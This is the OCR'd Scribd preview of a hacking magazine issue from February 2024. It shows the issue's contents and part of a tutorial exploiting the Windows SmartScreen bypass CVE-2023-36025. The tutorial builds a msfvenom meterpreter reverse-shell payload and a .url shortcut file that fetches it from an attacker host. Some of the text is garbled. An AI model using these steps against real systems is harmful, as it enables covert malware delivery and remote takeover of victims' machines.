Open navigation menu
Close suggestions
Search
Search
en
Change Language
Upload
Sign in
Sign in
Download free for days
0 ratings
0% found this document useful (0 votes)
37 views
38 pages
Hackercool - Edition 7 Issue 02february 2024 - Hackercool
hackercool
Uploaded by
attik farid
AI-enhanced title
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content,
claim it here
.
Available Formats
Download as PDF or read online on Scribd
Download
Save
Save OceanofPDF.com Hackercool - Edition 7 Issue 02Febr... For Later
0%
0% found this document useful, undefined
0%
, undefined
Embed
Share
Print
Report
0 ratings
0% found this document useful (0 votes)
37 views
38 pages
Hackercool - Edition 7 Issue 02february 2024 - Hackercool
hackercool
Uploaded by
attik farid
AI-enhanced title
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content,
claim it here
.
Available Formats
Download as PDF or read online on Scribd
Carousel Previous
Carousel Next
Download
Save
Save OceanofPDF.com Hackercool - Edition 7 Issue 02Febr... For Later
0%
0% found this document useful, undefined
0%
, undefined
Embed
Share
Print
Report
Download now
Download
You are on page 1
/ 38
Search
Fullscreen
Simplifying Cyber Security since 2016 MG Exploiting Windows Defender Smart Screen Security Bypass in INITIAL ACCESS INFECTION CHAIN From HTA file to payload via powershell script and DLL file, the Black Hat hacker style. BYPASSING AV / EDR How Black Hat hackers are using Github commit messages to hide their malicious activityCopyright © 2016 - 2024 Hackercool CyberSecurity (OPC) Pvt Ltd |All rights reserved. No part of this publication may be reproduced, distributed, or ee in any form or by any means, including photocopying, recording, or other| lectronic or mechanical methods, without the prior written permission of the lpublishe -r, except in the case of brief quotations embodied in critical reviews and certain other noncommercial uses permitted by copyright law. For permission requests, write to the publisher, addressed “Attention: Permissions Coordinator,” at |the address below. [Any references to historical events, real people, or real places are used fictitiously. Na mes, characters, and places are products of the author's imagination. Hackercool Cybersecurity (OPC) Pvt Ltd. Banjara Hills, Hyderabad 50003. Telangana, India. Website : www.hackercoolmagazine.com] Email Address : (min @hackercoolmagazinInformation provided in this Magazine is strictly for educational purpose only. Please don't misuse this knowledge to hack into devices or networks without taking permission. The Magazine will not take any responsibility for misuse of this information.4 Then you will know the truth and the truth will set you free John 8:32 Editor's Note Edition 7 Issue 2 [Hello readers, This is Kalyan Chinta with the latest Issue of Hackercool Magazine. Let’s give ou a quick summary of what this Issue contains. The first article of this Issue is ow to exploit a vulnerability in Windows Defender SmartScreen (CVE-2023- |36025) that is already popular with Black Hat Hackers around the world. This ulnerability describes how to gain initial access by bypassing Windows [Defender Smart Screen. Next article brings you one of the infection chains of |Ursniff banking trojan. This infection chain starts with a zip archive containing a single HTA file. When victims click on this HTA file, it downloads and executes la BowerShell script which then downloads and executes a DLL file which finally \downloads the payload and executes it on the target system. Yes, I show you ow to create the infection chain. Instead of using Ursniff trojan as payload, we jwill be using msfvenom meterpreter. Next, in Tool of the Month feature, we bring ‘ou a complete guide on [Hydra Password cracker. Then, you will learn how a ack Hat Hacker group jused Github commit messages to hide its malicious activity. Then you will learn labout multiple vulnerabilities disclosed recently in Ivanti VPN appliances and |their impact. Kalyan Chinta, Founder, Hackercool Magazine "GENERATIVE Al CAN BE USED TO EVADE STRING-BASED YARA RULES BY AUGMENTING THE SOURCE CODE OF SMALL MALWARE VARIANTS, EFFECTIVELY LOWERING DETECTION RATES." -RECORDED FUTURE ON Al'S INCREASING ROLE IN DEEPFAKES AND MALWAREINSIDE See what our Hackercool Magazine's February 2024 Issue has in store for you. 1. Initial Access: Exploiting Windows Defender Smart Screen Security Bypass. 2. Infection Chain: Ursniff banking trojan. 3. Tool Of The Month: Hydra password cracker. 4. Cyber security: Cybersecurity for satellites is a growing challenge, as threats to space- based infrastructure grow. 5. Bypassing AV/EDR: How a Black Hat Hacker group is exploiting Github commit messages to hide their] malicious activity. 6. Vulnerability for beginners: Learn about multiple vulnerabilities in Ivanti VPN appliances. Other Useful Resources6 Exploiting Windows Defender Smart Screen security bypass INITIAL ACCESS Threat Actors exploited the Windows Defender Smart screen security bypass vulnerability to \deploy an open-source stealer called Phemodrone stealer on the target systems on January 2024. he same vulnerability was exploited by another hacker group behind Mispadu banking trojan in lthe first week of February 2024. Recently a hacker group named Water Hydra (aka Dark Casino) lexploited this vulnerability to deploy Darkme malware. But what exactly is this Windows [Defender Smart screen security bypass vulnerability? To know this, first you have to learn what is Windows Smart screen and what it does. Before, I explain about this vulnerability, let’s see it in action first. For this, I am using Kali Linux las attacker machine and Windows 10 20H2 as target system. Simply put, I create a meterpreter ayload using ms enom -p Pee CUT hee eae ee et ee ee 2.168.249.148 lport=80 o> MAAC eat ad) A ee ka p_148_80.exe msfvenom -p windows/x64/meterpreter/reverse_http lLhost=19 Peel Pe Lee Crema CLT ad) Ae [eS et >) [-] No platform was selected, choosing Msf::Modul Par hace :Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 695 bytes Final size of exe file: 7168 bytes Then, I host it on the attacker system using the python single http server. We have many times in our previous Issues. As you might have expected, I download it on the target system using a browser. Normally, I just lexecute it but not in this case. I right click on the file and click on the “Properties” tab.At the end lof the “Properties” window, you should see this. This message is from Mark of The Web (MoTW) labout which you studied in one of our previous Issues. en its so “When hackers have acceso powerful computer tha use brute foyce hain can crack almost any password; even one user with insecure access being succ hacked can result in a major breach.” -Toomas Hendrik Tlves7 1H met x64_http_148_80 Properties x General Compatibility Securty Details Previous Versions 5 aeeas Type of file: Application (exe) Description: met_x64_http_148_80 Location: C:\Users\admin\Downloads Sze’ 7.00 KB (7.168 bytes) Size on disk: 8,00 KB (8,192 bytes) Created Monday, March 4, 2024, 12:26:31 PM Modfied: Monday, March 4, 2024, 12:26:49 PM Accessed: Today, March 4, 2024, 12:26:49 PM CiReadonly []Hidden Advanced... This fle came from another computer and might be blocked to help protect this computer. Dunbiock Cancel Aeply Now, I will execute it by simply double clicking on the file. However, instead of giving us a meterpreter session as expected, we get a blue window. This is Windows Defender Smartscreen lin action. Read the message carefully. “It’s no surprise that hackers working for North Korea, Iran's mullahs, Vladimir V, Putin in Russia, and the People’s Liberation Army of China have all learned that the great advantage of cyberweapons is that they are ihe opposite of a nuke: hard to detect, easy to deny, and increasingly finely targeted.” -David E. SangerWindows protected your PC What Smart Screen did was that it blocked our app from running as it considered it as malicious. jot just mine, it will block any app that it considers as malicious. But how does it determine the file as malicious? What is Microsoft Windows Defender Smart Screen? Microsoft Defender Smart screen is a Windows feature that protects users against phishing lor malware websites, applications and downloading potentially malicious files. Smart screen also ldetermines if a downloaded app is malicious by checking the downloaded files against a list of files that are downloaded frequently. If the file is not on that list, it displays the message as the one khown above. What is CVE-2023-36025? Windows Smart screen security feature bypass vulnerability that is assigned with CVEID |CVE-2023.36025. This vulnerability allows attackers to bypass the Windows smart screen altogethe r and install files on the target system. Let us see how to exploit this to execute the meterpreter payload we used above. For this we will need an URL file.9 What is an URL file? An URL file is an Internet shortcut file: Let see how to create one. For this, I open a new text ldocument on Windows (Notepad) and add this code to the file, “| New Text Document - Notepad File Edit Format View Help [InternetShortcut] URL=http: //192. 168.249. 148:8000/met_x64_http_148_80.exe IDLIST-| Then, I save it with a different name but the same extension (;txt). I named it “hc_test.txt”. Note lthat I didn’t change any extension. It isstill a text file, _)) he_test - Notepad File Edit Format View Help [InternetShortcut] URL=http: //192.168.249.148:8000/met_x64_http_148_80.exe IDLIST-| INext, I open this ‘he_test.txt’ file and rename it to “hc_test.url’ as shown below. The file is still a text document only. File name: | he_test.url Save as type: | Text Documents (*.tet) Encoding: | UTF-8 v Cancel (Our URL file is ready as shown below. ” Hide Folders
You might also like
Bug Bounty Checklist Fillable
PDF
No ratings yet
Bug Bounty Checklist Fillable
5 pages
Bug Hunter Methodology V4 (@jhaddix) : Finding Seeds
PDF
0% (1)
Bug Hunter Methodology V4 (@jhaddix) : Finding Seeds
1 page
Bugbounty Cheetsheet
PDF
No ratings yet
Bugbounty Cheetsheet
33 pages
Lab Manual On Bug - Bounty
PDF
No ratings yet
Lab Manual On Bug - Bounty
30 pages
Lab 7 - Wireshark Ethernet ARP v8.1 PhuongVo
PDF
No ratings yet
Lab 7 - Wireshark Ethernet ARP v8.1 PhuongVo
10 pages
Bug Hunting Earn Money
PDF
No ratings yet
Bug Hunting Earn Money
4 pages
Bug Bounty Tips - Tricks
PDF
No ratings yet
Bug Bounty Tips - Tricks
101 pages
Hackercool - Edition 5 Issue 7 July 2022 - Hackercool
PDF
No ratings yet
Hackercool - Edition 5 Issue 7 July 2022 - Hackercool
64 pages
Lab 10 - Performing Evil Portal Attack With The Wi-Fi Pineapple
PDF
No ratings yet
Lab 10 - Performing Evil Portal Attack With The Wi-Fi Pineapple
4 pages
Intro Rooms
PDF
No ratings yet
Intro Rooms
8 pages
Recon NG
PDF
No ratings yet
Recon NG
15 pages
Metasploit Cheat Sheet
PDF
No ratings yet
Metasploit Cheat Sheet
1 page
Kali Linux Assuring Security by Penetration Testing Sample Chapter
PDF
No ratings yet
Kali Linux Assuring Security by Penetration Testing Sample Chapter
43 pages
Bug Bounty Course LEAK 2023
PDF
No ratings yet
Bug Bounty Course LEAK 2023
1 page
Information Gathering Report On: Target Website
PDF
No ratings yet
Information Gathering Report On: Target Website
29 pages
Dorking
PDF
No ratings yet
Dorking
2 pages
Bugbounty Compressed
PDF
No ratings yet
Bugbounty Compressed
36 pages
Wireshark Tutorial Identifying Hosts
PDF
No ratings yet
Wireshark Tutorial Identifying Hosts
13 pages
Hack Windows Using Metasploit Lab Manual
PDF
No ratings yet
Hack Windows Using Metasploit Lab Manual
3 pages
Tryhackme: Overpass 2 - Hacked Walkthrough: 1. What Was The Url of The Page They Used To Upload A Reverse Shell?
PDF
100% (1)
Tryhackme: Overpass 2 - Hacked Walkthrough: 1. What Was The Url of The Page They Used To Upload A Reverse Shell?
11 pages
M0chan Bug Bounty Cheatsheet
PDF
No ratings yet
M0chan Bug Bounty Cheatsheet
43 pages
Android Exploits 101
PDF
No ratings yet
Android Exploits 101
46 pages
Bug Bounty
PDF
No ratings yet
Bug Bounty
1 page
Ssrffinal
PDF
No ratings yet
Ssrffinal
23 pages
How To Access .Onion Sites (Also Known As Tor Hidden Services)
PDF
No ratings yet
How To Access .Onion Sites (Also Known As Tor Hidden Services)
14 pages
Bugcrowd Vulnerability Rating Taxonomy 1.10
PDF
No ratings yet
Bugcrowd Vulnerability Rating Taxonomy 1.10
14 pages
Wordlist Resources PDF
PDF
No ratings yet
Wordlist Resources PDF
1 page
Hackercool - Edition 7 Issue 06 June 2024 - Hackercool
PDF
No ratings yet
Hackercool - Edition 7 Issue 06 June 2024 - Hackercool
56 pages
GPG Cheatsheet
PDF
No ratings yet
GPG Cheatsheet
1 page
Recon For Web Pen-Testing
PDF
No ratings yet
Recon For Web Pen-Testing
17 pages
SN Topics 1 2 Internet (HTTP) 3 Computer Networking TCP/IP 4 Book
PDF
No ratings yet
SN Topics 1 2 Internet (HTTP) 3 Computer Networking TCP/IP 4 Book
1 page
Pentest-Report Mullvad v1
PDF
No ratings yet
Pentest-Report Mullvad v1
9 pages
Bug Hunting
PDF
No ratings yet
Bug Hunting
2 pages
Georgoa Weidman Resume
PDF
No ratings yet
Georgoa Weidman Resume
6 pages
From Iges To STL
PDF
No ratings yet
From Iges To STL
15 pages
Quick
PDF
No ratings yet
Quick
21 pages
Hash Cracking With Rainbow Tables
PDF
No ratings yet
Hash Cracking With Rainbow Tables
4 pages
WP Integrating Active Directory ML
PDF
No ratings yet
WP Integrating Active Directory ML
14 pages
Lk2008 Android Security
PDF
No ratings yet
Lk2008 Android Security
17 pages
Hackers Could Shut Down Satellites - or Turn Them Into Weapons - GCN
PDF
No ratings yet
Hackers Could Shut Down Satellites - or Turn Them Into Weapons - GCN
15 pages
Browsers
PDF
No ratings yet
Browsers
20 pages
Hackercool Edition 0 Issue 9 June 2017
PDF
No ratings yet
Hackercool Edition 0 Issue 9 June 2017
29 pages
Will Bold 2023 Space Odyssey
PDF
No ratings yet
Will Bold 2023 Space Odyssey
19 pages
Cybersecurity Space Operation Center Countering Cyber Threats in The Space Domain PDF
PDF
No ratings yet
Cybersecurity Space Operation Center Countering Cyber Threats in The Space Domain PDF
20 pages
Digital Data Extraction For Vehicles Forensic Investigation
PDF
No ratings yet
Digital Data Extraction For Vehicles Forensic Investigation
6 pages
Ethical Hacking Tools Preview
PDF
No ratings yet
Ethical Hacking Tools Preview
39 pages
Course Handbook
PDF
No ratings yet
Course Handbook
132 pages
Cyber Attacks On UAV Networks A Comprehensive Survey
PDF
No ratings yet
Cyber Attacks On UAV Networks A Comprehensive Survey
13 pages
A Decade of Cybersecurity Challenges and Solutions For Satellite Systems
PDF
No ratings yet
A Decade of Cybersecurity Challenges and Solutions For Satellite Systems
13 pages
Bug Bounty Programs For Cyber-Security
PDF
No ratings yet
Bug Bounty Programs For Cyber-Security
9 pages
Cyber Foresics - Tools
PDF
No ratings yet
Cyber Foresics - Tools
11 pages
Istr Living Off The Land and Fileless Attack Techniques en
PDF
No ratings yet
Istr Living Off The Land and Fileless Attack Techniques en
30 pages
ESET Windows Exploit
PDF
No ratings yet
ESET Windows Exploit
26 pages
Common Tools and Methods Used in Vulnhub CTF's
PDF
No ratings yet
Common Tools and Methods Used in Vulnhub CTF's
4 pages
Malicious PDF Analysis Ebook
PDF
No ratings yet
Malicious PDF Analysis Ebook
23 pages
Zion: 1.1 Vulnhub Walkthrough: Penetration Testing Methodology
PDF
No ratings yet
Zion: 1.1 Vulnhub Walkthrough: Penetration Testing Methodology
15 pages
Garuda User Manual
PDF
No ratings yet
Garuda User Manual
67 pages
Secrets of Google VRP
PDF
No ratings yet
Secrets of Google VRP
54 pages
Hackercool - August 2020
PDF
No ratings yet
Hackercool - August 2020
69 pages
Hackercool April 2020.@enmagazine
PDF
No ratings yet
Hackercool April 2020.@enmagazine
65 pages